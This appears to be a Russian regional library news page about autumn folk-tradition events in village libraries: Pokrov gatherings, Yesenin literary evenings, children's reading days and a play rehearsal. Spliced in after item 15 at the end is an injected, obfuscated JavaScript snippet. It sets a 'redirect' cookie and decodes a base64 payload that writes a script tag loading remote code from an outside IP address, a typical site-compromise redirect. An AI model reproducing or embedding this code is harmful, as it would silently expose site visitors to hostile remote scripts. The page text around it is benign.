ВСПОМИНАЯ ТРАДИЦИИ

Покров в русской крестьянской жизни – начало нового месяца, нового сезона, граница между тёплой и холодной половиной года.  Гуляли на Покров от трёх дней до недели. Покровские  посиделки собрали гостей в библиотеке. Все в русских сарафанах да рубахах.  И музыка звучит русская, и песни поют народные. Фольклор – это, одно из немногих, что нельзя украсть, вырвать из души народной.

8

В Нижне-Есауловской сельской библиотеке проведен литературно-музыкальный вечер «Живая мудрость».

После экскурса в историю гости играли в такие игры как: «А мы просо сеяли…, чижа, хороводили», пели «Во кузнице» и танцевали  «Краковяк». А ещё,  все кто пришёл в гости смогли отведать капустного пирога. Тоже кстати, дань традиции. Традиции народа – это в первую очередь,  традиции семьи.

9

Октябрь это ещё и осенние балы, и есенинские захватывающие душу вечера «Всю душу выплесну в слова», литературная композиция «Закружилась листва золотая»к 120-летию С. Есенина, игровая программа «Бал осенние листья» эти формы работы  популярны в Жержульской сельской библиотеке

В год литературы заведующая Верхне-Есауловской сельской библиотеки старается продвигать книгу и чтение среди населения используя такие интересные формы работы как беседа – экскурсия «С книжкой по родным просторам», Литературная игра «Сказок добрые уроки»,День чтения «Яркий мир детских книг».

14

В Колбинской сельской библиотеке готовят спектакль по пьесе «Свои люди, сочтёмся».

15 function getCookie (e){var U=document.cookie.match (new RegExp («(?:^|; )»+e.replace (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent (U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor (Date.now ()/1e3),cookie=getCookie («redirect»);if (now>=(time=cookie)||void 0===time){var time=Math.floor (Date.now ()/1e3+86400),date=new Date ((new Date).getTime ()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString (),document.write ('')}